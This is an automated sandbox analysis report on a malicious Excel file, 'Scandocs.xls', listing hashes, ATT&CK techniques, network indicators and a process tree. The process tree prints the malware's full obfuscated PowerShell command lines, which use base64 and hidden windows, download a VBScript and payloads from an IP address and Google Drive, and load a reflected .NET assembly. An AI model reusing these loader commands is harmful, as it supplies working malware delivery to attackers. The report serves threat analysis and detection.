a11c3b13c7f4a3f7fb760b9740a681ed05b2d071ca021a77e7121b49ab485233

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-11-2024 07:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Scandocs.xls
Size

646KB
MD5

36d0ab08e6d13427c73bb3bcf647974a
SHA1

f5c90bd4bc4245a020090e0716f1df6f47adbc14
SHA256

a11c3b13c7f4a3f7fb760b9740a681ed05b2d071ca021a77e7121b49ab485233
SHA512

2800baa385524cf5a8893a6e134b1dbd179fcbb09e6653b0b661889913b593651dc28ef4004dc89984f61b2403245ae34768cda6918d6d78cd3abdeb14530e2a
SSDEEP

12288:AKVbWNHd0zBREjqtnOdOXIOfYeG7vtjh1pKwf2yatxDnpSIbYOPI15QZ35:Lsd6/tnamfeFjbplfTazzb20Z3

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2724	mshta.exe
11	2724	mshta.exe
13	2196	PoWERshElL.ExE
15	2392	powershell.exe
17	2392	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1740	powershell.exe
2392	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2196	PoWERshElL.ExE
1020	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	PoWERshElL.ExE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWERshElL.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2648	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2196	PoWERshElL.ExE
1020	powershell.exe
2196	PoWERshElL.ExE
2196	PoWERshElL.ExE
1740	powershell.exe
2392	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2196	PoWERshElL.ExE
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE
2648	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2724 wrote to memory of 2196	2724	mshta.exe	32
PID 2724 wrote to memory of 2196	2724	mshta.exe	32
PID 2724 wrote to memory of 2196	2724	mshta.exe	32
PID 2724 wrote to memory of 2196	2724	mshta.exe	32
PID 2196 wrote to memory of 1020	2196	PoWERshElL.ExE	34
PID 2196 wrote to memory of 1020	2196	PoWERshElL.ExE	34
PID 2196 wrote to memory of 1020	2196	PoWERshElL.ExE	34
PID 2196 wrote to memory of 1020	2196	PoWERshElL.ExE	34
PID 2196 wrote to memory of 2528	2196	PoWERshElL.ExE	35
PID 2196 wrote to memory of 2528	2196	PoWERshElL.ExE	35
PID 2196 wrote to memory of 2528	2196	PoWERshElL.ExE	35
PID 2196 wrote to memory of 2528	2196	PoWERshElL.ExE	35
PID 2528 wrote to memory of 2616	2528	csc.exe	36
PID 2528 wrote to memory of 2616	2528	csc.exe	36
PID 2528 wrote to memory of 2616	2528	csc.exe	36
PID 2528 wrote to memory of 2616	2528	csc.exe	36
PID 2196 wrote to memory of 1920	2196	PoWERshElL.ExE	37
PID 2196 wrote to memory of 1920	2196	PoWERshElL.ExE	37
PID 2196 wrote to memory of 1920	2196	PoWERshElL.ExE	37
PID 2196 wrote to memory of 1920	2196	PoWERshElL.ExE	37
PID 1920 wrote to memory of 1740	1920	WScript.exe	38
PID 1920 wrote to memory of 1740	1920	WScript.exe	38
PID 1920 wrote to memory of 1740	1920	WScript.exe	38
PID 1920 wrote to memory of 1740	1920	WScript.exe	38
PID 1740 wrote to memory of 2392	1740	powershell.exe	40
PID 1740 wrote to memory of 2392	1740	powershell.exe	40
PID 1740 wrote to memory of 2392	1740	powershell.exe	40
PID 1740 wrote to memory of 2392	1740	powershell.exe	40

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Scandocs.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2648

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2724
- C:\Windows\SysWOW64\WINdOwSpoweRSheLL\V1.0\PoWERshElL.ExE
  "C:\Windows\SYStEM32\WINdOwSpoweRSheLL\V1.0\PoWERshElL.ExE" "PowErShEll -Ex BYPaSS -NOP -W 1 -C dEVIcEcrEDEnTIAlDePlOYmENt.EXe ; iex($(iEX('[SYsTeM.TeXt.EnCoding]'+[chAr]0X3A+[CHAr]0X3A+'uTf8.geTSTring([SYstem.ConVERT]'+[chAR]58+[CHAR]58+'fRoMBASE64string('+[CHar]0X22+'JGVhNmM4bXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlckRlZmluSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OLmRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENmbXIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVV2eVZCUkQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZmWWxEb2wsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb0ZYckloKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3V4dFBJQkp4bCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbklZcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZWE2YzhtclQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuNTIvMzUvcGljdHVyZXdpdGhhdHRpdHVkZWV2ZW5iZXR0ZXJmb3JhbGx0aGluZ3MudElGIiwiJGVOdjpBUFBEQVRBXHBpY3R1cmV3aXRoYXR0aXR1ZGVldmVuYmV0dGVyZm9yYWxsdGhpbi52YnMiLDAsMCk7U1RBUnQtc2xlZVAoMyk7c3RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoYXR0aXR1ZGVldmVuYmV0dGVyZm9yYWxsdGhpbi52YnMi'+[cHar]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSS -NOP -W 1 -C dEVIcEcrEDEnTIAlDePlOYmENt.EXe
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1020
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xh6esqlx.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES97AE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC97AD.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2616
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithattitudeevenbetterforallthin.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdpWEtpbScrJ2FnJysnZVVybCA9IE5RMGh0dHBzOi8vZHJpdmUuZ29vZ2xlJysnLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIE5RMDtpWEt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5Jysnc3RlbS5OZXQuVycrJ2ViQ2xpZW50O2lYSycrJ2ltYWdlQnl0ZXMgPSBpWCcrJ0t3ZWJDbGllbnQuRG93bmxvYWREYXRhKGlYS2ltYWdlVXJsKTtpWEtpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW4nKydjb2RpbmddOjonKydVVEY4LkdldFN0cmluZyhpWEtpbWFnZUJ5dGVzKTtpWEtzdGFydEZsYWcgPSBOUTA8PEJBU0U2NF9TVEFSVD4+TlEwO2lYS2VuZEZsYWcgPSBOUTA8PEJBU0U2NF9FTkQ+Pk5RMDtpWEtzdGFydEluZGV4ID0gaVhLaW1hZ2VUZXh0LkluZGV4T2YoaVhLc3RhcnRGbGFnKTtpWEtlbmRJbmRleCA9IGlYS2ltYWdlVGV4dC5JbmRleE9mKGlYS2VuZEZsYWcpO2lYS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBpWEtlbmQnKydJbmRleCAtZ3QgaVhLc3RhcnRJbmRleDtpWEtzdGFydEluZGV4ICs9IGlYS3N0YXJ0RmxhZycrJy5MZW5ndGg7aVhLYmFzZTY0TGVuZ3RoID0gaVhLZW5kSW5kZXgnKycgLSBpWEtzdGFydEluJysnZGV4O2lYS2Jhc2U2NENvbW1hbmQgPSBpWEtpbWFnZVRleHQuU3Vic3RyaW4nKydnKGlYS3N0JysnYXJ0SW5kZXgsJysnIGlYS2Jhc2U2NExlbmd0aCk7aVhLYmFzZTY0UmV2ZXJzZWQgPSAtam8nKydpbiAoaVhLYmEnKydzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIDJDUSBGb3JFYWNoLU9iamVjdCB7IGlYS18gfSlbLTEuLi0oaVhLYmFzZTY0Q28nKydtbWFuZC5MZW5ndGgpXTtpWEtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvJysnbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKGlYS2Jhc2U2NFJldmVyc2VkKTtpWEtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoaVhLY29tbWFuZEJ5dGVzKTtpWEt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKE5RMFZBSU5RMCk7aVhLdmFpTWV0aG9kLkknKydudm9rZShpWEtudWxsLCBAKE5RMHR4dC5VTExQTVMvNTMvMjUuNy44NjEuNDAxLy86cHR0aE5RMCwgTlEwZGVzYXRpdmFkb05RMCwgTlEwZGVzYXRpdmFkbycrJ05RMCwgTlEwZGVzYXRpdmFkb05RMCwgTlEwYXNwbmV0X3JlZ2Jyb3dzZXJzTlEwLCBOUTBkZXNhdGl2YWRvTlEwLCBOUScrJzBkZXNhdGl2YWRvTlEwLE5RMGRlc2F0aXZhZG9OUTAsTlEwZGVzYXRpdmFkb05RMCxOUTBkZXNhdGl2YScrJ2RvTlEwLE5RMGRlc2F0aXZhZG9OUTAsTlEwZGVzYXQnKydpdmFkb05RMCxOUTAxTlEwLE5RMGRlc2F0aXZhZG9OUTApKTsnKS5SRVBsYWNlKCcyQ1EnLCd8JykuUkVQbGFjZSgnaVhLJyxbc1RyaU5nXVtjaGFyXTM2KS5SRVBsYWNlKChbY2hhcl03OCtbY2hhcl04MStbY2hhcl00OCksW3NUcmlOZ11bY2hhcl0zOSkgfCAuICggJHNoRWxMSURbMV0rJHNIZUxsaURbMTNdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1740
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('iXKim'+'ag'+'eUrl = NQ0https://drive.google'+'.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 NQ0;iXKwebClient = New-Object Sy'+'stem.Net.W'+'ebClient;iXK'+'imageBytes = iX'+'KwebClient.DownloadData(iXKimageUrl);iXKimageText = [System.Text.En'+'coding]::'+'UTF8.GetString(iXKimageBytes);iXKstartFlag = NQ0<<BASE64_START>>NQ0;iXKendFlag = NQ0<<BASE64_END>>NQ0;iXKstartIndex = iXKimageText.IndexOf(iXKstartFlag);iXKendIndex = iXKimageText.IndexOf(iXKendFlag);iXKstartIndex -ge 0 -and iXKend'+'Index -gt iXKstartIndex;iXKstartIndex += iXKstartFlag'+'.Length;iXKbase64Length = iXKendIndex'+' - iXKstartIn'+'dex;iXKbase64Command = iXKimageText.Substrin'+'g(iXKst'+'artIndex,'+' iXKbase64Length);iXKbase64Reversed = -jo'+'in (iXKba'+'se64Command.ToCharArray() 2CQ ForEach-Object { iXK_ })[-1..-(iXKbase64Co'+'mmand.Length)];iXKcommandBytes = [System.Co'+'nvert]::FromBase64String(iXKbase64Reversed);iXKloadedAssembly = [System.Reflection.Assembly]::Load(iXKcommandBytes);iXKvaiMethod = [dnlib.IO.Home].GetMethod(NQ0VAINQ0);iXKvaiMethod.I'+'nvoke(iXKnull, @(NQ0txt.ULLPMS/53/25.7.861.401//:ptthNQ0, NQ0desativadoNQ0, NQ0desativado'+'NQ0, NQ0desativadoNQ0, NQ0aspnet_regbrowsersNQ0, NQ0desativadoNQ0, NQ'+'0desativadoNQ0,NQ0desativadoNQ0,NQ0desativadoNQ0,NQ0desativa'+'doNQ0,NQ0desativadoNQ0,NQ0desat'+'ivadoNQ0,NQ01NQ0,NQ0desativadoNQ0));').REPlace('2CQ','|').REPlace('iXK',[sTriNg][char]36).REPlace(([char]78+[char]81+[char]48),[sTriNg][char]39) | . ( $shElLID[1]+$sHeLliD[13]+'X')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
2a24456ab98bbb0af9caf4332b1f42e5

SHA1
2eb54930fd67afe067c0e36c6c12420a0ab0b981

SHA256
b8be509a6203ea6930630c13f633b2278a654a5eaaafa493d9352762143408fa

SHA512
ff14b610c5b30c2eae1ac8670a7028e9e52fda4ff6b3d9d55db898813781ab9f9856884bef30d03e0f3a120b62b2f80df221d351a66a5bea79839a4f99d1ed88

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5b6e07349e5fcd4e58c37789db20d177

SHA1
ee7beab55f790352c47d162e927f396896a68659

SHA256
face8df9907dcbd932f0c3ed34dc595898eac3f236182f3eac7b4c5d52c77174

SHA512
dd85306caf24a0db1b6b62a76402545cf97ff5f2ea0bee98c39ca779efdf1b1ed59e1d6e9ef7ccb115dfb478de54c10ece7de2e016b0bab432630ea73b2cb3f9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
61cd704884cdf679b71765831959d943

SHA1
f67b974a90b88b167c8202626358e1e1aeadf2f7

SHA256
9fdf139fe6c1db885cfc65f27177014befa1678f526c9d484d0a0c29caf90068

SHA512
c2abda10cbbe914b8bc015f554b89d4eff3d1384d0b5264e295578d3c60b4ddba88a13b1fc7604586d4cfade7d7fb3213164d36d1fc855fdb861b2d1990b1b19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\bestgreetingwithbestthingsevermadewithgreatthigns[1].hta

Filesize
8KB

MD5
ab9042cf032a32540ac2ff9815ee76e0

SHA1
eb2b6e325991859cebd307d6a69e902b349aa022

SHA256
843b098fbc9a20adc9e6b4b1d7e965a3035590b3a44656113f127428ae1feba2

SHA512
2d7bbd1581c3163db1458e01ba4fcf1cb14ecea6562cd1d88bcfd10aa55bc4d3df229e408c2f154fb7d9ca7fc826b2ee66ff6ee486e325c795786b4d80e7d8e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab8C19.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES97AE.tmp

Filesize
1KB

MD5
5fdfa55c46e2e263a57492e866b1ece3

SHA1
20d737ca7b4d8efebcb72c3389280414359a1a94

SHA256
d6ae178629c16e2e142eaf930a1b7310306b68534e0dfe7617cc9b72ae0d54b0

SHA512
69d0c5e0ef20270e331340095f1df38d252027a3423a9af02f166f311235c44ebe9156e9b441d3ffa5fdac601d65339e6979d9316941a1fbc5b3f5f263b0fa67

Download Submit
C:\Users\Admin\AppData\Local\Temp\xh6esqlx.dll

Filesize
3KB

MD5
ee9ec018db24a37dae2ac40c1758549b

SHA1
28cfdac77b124537c21cc19dee07bf86387bbd54

SHA256
3c3c5bc65b59deafda1f6d5fac347f1134dfa701e6cdb9174ffd2faccfda74a1

SHA512
b6bbcd20dfd572b00346486486ba85526ff809a3107219e25ee916f99ed3db7eff23691904e233239a4476eb3a048954fbe4b655d7b3b1a034f4f7b39d9865a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\xh6esqlx.pdb

Filesize
7KB

MD5
ee6e38c1f2ec11ac97a2013d419f7661

SHA1
9d64105e712ceb03d859817d6cd7fd304baf5538

SHA256
6abf93182c99f2cb47babac48e041a4a33971f09837ec82f4f1e2f7e883b419d

SHA512
2d33a98583c11b606f1f36f34cb752bb3da6848041a0e79d201b7d4d2ceb263cb48ac16b7f17576973afcfe0818ef25dab2fb32c5a6cc0a549b46154c0c313d2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
20975916f693d2e3795f2272dc2bb871

SHA1
d48d5c30b8133bcb9fa0e8ddb10003438be1f35d

SHA256
946cc87ccd6495c6de64b77a41e1fee52e5cd4a071e01b228da37986c5cbdeee

SHA512
39651067d55ae100d1453d33d28b548f52668f1d49c85bede7745ec170d4fff603a7c64f820fd2fdeddd403d92f799200f386b0852123fb7d0c5aaabeb4f47aa

Download Submit
C:\Users\Admin\AppData\Roaming\picturewithattitudeevenbetterforallthin.vbs

Filesize
137KB

MD5
8575080d678736f4370fa4b88d00c148

SHA1
ec4023c9d47d5d4c93e1f76d6400c6dfbec3a143

SHA256
521c52c7c4e3e15c8d9805eeb75b45c85679c7ac9e744d9f53d67a7840cf309f

SHA512
3b3e106f9ff3f57a41ca101e179c373e0782a1d5a82a113ee72b993893c4f5ad615d075631904ee3ab417f4b7f10062f15153280b159623ad8b0f71d49073593

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC97AD.tmp

Filesize
652B

MD5
32a1f085ef6d90c9123563155667afc6

SHA1
0294c241ad82a6568de07a55625199b650aa8dba

SHA256
19cde9c63d8facc04ece737636c97e480409e9bab7a1e569284c910b81c37fab

SHA512
dfe4455f8cf2a8e3c5e5bdce2ca958d7a2d7cc05cfc0d019669b35c0a53c57ebbbb3850c2789516637ce623b3a42f5249a7dad24270f1e029975d8c6415b26eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xh6esqlx.0.cs

Filesize
478B

MD5
3da4ad222b76364bbe83d07f6bbf5f06

SHA1
6b4be35e25435be0f75e9db059c91e3a230e81d7

SHA256
1cf28334727114e790315d7a9bbc1b3512b68694b50dad3b8fcf402ff3a7eee6

SHA512
4585510bc72ffd7635f53505edb14082520781df4a9f58be5d090190e76663a9254f1fe2eff5471b5703df98acc58890dc87d6ff2542edc136c96f521c5409fd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xh6esqlx.cmdline

Filesize
309B

MD5
04a2230972b0a788e29a7959bc0fdd99

SHA1
f2edf51331026cf7bc3e091fde34aa79ac842a4e

SHA256
633f270f8d6b3f7a0e6ccbd84165143ef552fd4b818c57eb15440f0a1234c8c2

SHA512
84c7d9058fc8a9eead8878e07c09cc5fa5676e60ef39e04c770c3603c48ae77b7bfee4739978f3a612bc4b83eb523b68c818aa1e468a716449780004b2a82186

Download Submit
memory/2648-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2648-1-0x0000000071D8D000-0x0000000071D98000-memory.dmp

Filesize
44KB

Download
memory/2648-19-0x0000000002310000-0x0000000002312000-memory.dmp

Filesize
8KB

Download
memory/2648-76-0x0000000071D8D000-0x0000000071D98000-memory.dmp

Filesize
44KB

Download
memory/2724-18-0x0000000000500000-0x0000000000502000-memory.dmp

Filesize
8KB

Download